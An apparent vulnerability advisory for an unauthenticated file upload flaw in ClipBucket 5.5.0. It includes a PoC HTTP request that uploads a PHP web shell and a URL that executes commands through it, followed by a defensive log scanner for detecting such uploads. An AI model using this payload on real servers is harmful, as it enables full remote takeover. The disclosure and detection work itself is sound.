ClipBucket 5.5.0 Arbitrary File Upload

2026.02.14
Risk: High
Local: No
Remote: Yes
CWE: CWE-264

# Exploit Title: ClipBucket 5.5.0 - Arbitrary File Upload
# Google Dork: N/A
# Date: 2025-09-11
# Exploit Author: Mukundsinh Solanki (r00td3str0y3r)
# Vendor Homepage: https://clipbucket.com
# Software Link: https://github.com/MacWarrior/clipbucket-v5
# Version: <= 5.5.0
# Tested on: Ubuntu 20.04 LTS, PHP 7.4
# CVE: CVE-2025-55912

## Vulnerability Description:

ClipBucket <= 5.5.0 suffers from an unauthenticated arbitrary file upload vulnerability in `upload/actions/photo_uploader.php`. Missing access controls and insufficient validation of uploaded files allow an attacker to upload a crafted PHP file and execute it remotely, leading to full remote code execution (RCE).

## PoC Request:

POST /upload/actions/photo_uploader.php HTTP/1.1
Host: victim.com
Content-Type: multipart/form-data; boundary=----BOUND

------BOUND
Content-Disposition: form-data; name="Filedata"; filename="shell.php"
Content-Type: application/x-php

<?php system($_GET['cmd']); ?>
------BOUND--

The file is uploaded without authentication. The attacker can then access it:

http://victim.com/files/photos/shell.php?cmd=id

## Impact:

- Unauthenticated remote code execution (RCE)
- Full compromise of target application and underlying server

Regards,
Mukundsinh Solanki
+916355251151
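
A defender-side log check for the pattern described above, added here as an example and not part of the original advisory or the ClipBucket code base. It reports script files requested under `/files/photos/` and marks those preceded by a POST to the uploader from the same client; the combined access-log format, the extension list and the sample lines are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Paths come from the advisory; the "combined" access-log format is an assumption.
UPLOADER = "/upload/actions/photo_uploader.php"
PHOTO_DIR = "/files/photos/"
# Script extensions a photo store should never serve (assumed list; match your PHP handlers).
SCRIPT_EXT = re.compile(r"\.(?:php\d?|phtml|phar)(?:/|$)", re.IGNORECASE)
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def scan(lines):
    """Return (kind, ip, path, status) for each script request under PHOTO_DIR."""
    uploaders = set()  # clients whose POST to the uploader was not rejected
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, status = m["ip"], int(m["status"])
        # Drop the query string and decode %xx so "a.%70hp" is seen as "a.php".
        path = unquote(urlsplit(m["target"]).path)
        if m["method"] == "POST" and path == UPLOADER and status < 400:
            uploaders.add(ip)  # used for correlation only, not reported by itself
        elif path.startswith(PHOTO_DIR) and SCRIPT_EXT.search(path):
            kind = "script_after_upload" if ip in uploaders else "script_in_photo_dir"
            findings.append((kind, ip, path, status))
    return findings

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [11/Sep/2025:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [11/Sep/2025:10:02:13 +0000] "POST /upload/actions/photo_uploader.php HTTP/1.1" 200 87 "-" "curl/8.5.0"',
    '203.0.113.9 - - [11/Sep/2025:10:02:15 +0000] "GET /files/photos/pic.php?x=1 HTTP/1.1" 200 12 "-" "curl/8.5.0"',
    '198.51.100.7 - - [11/Sep/2025:10:03:00 +0000] "GET /files/photos/cat.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [11/Sep/2025:10:05:42 +0000] "GET /files/photos/old.phtml HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

A `script_in_photo_dir` hit with a 404 status is a probe; any hit with a 200 status means a script exists in the photo store and the host should be examined.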

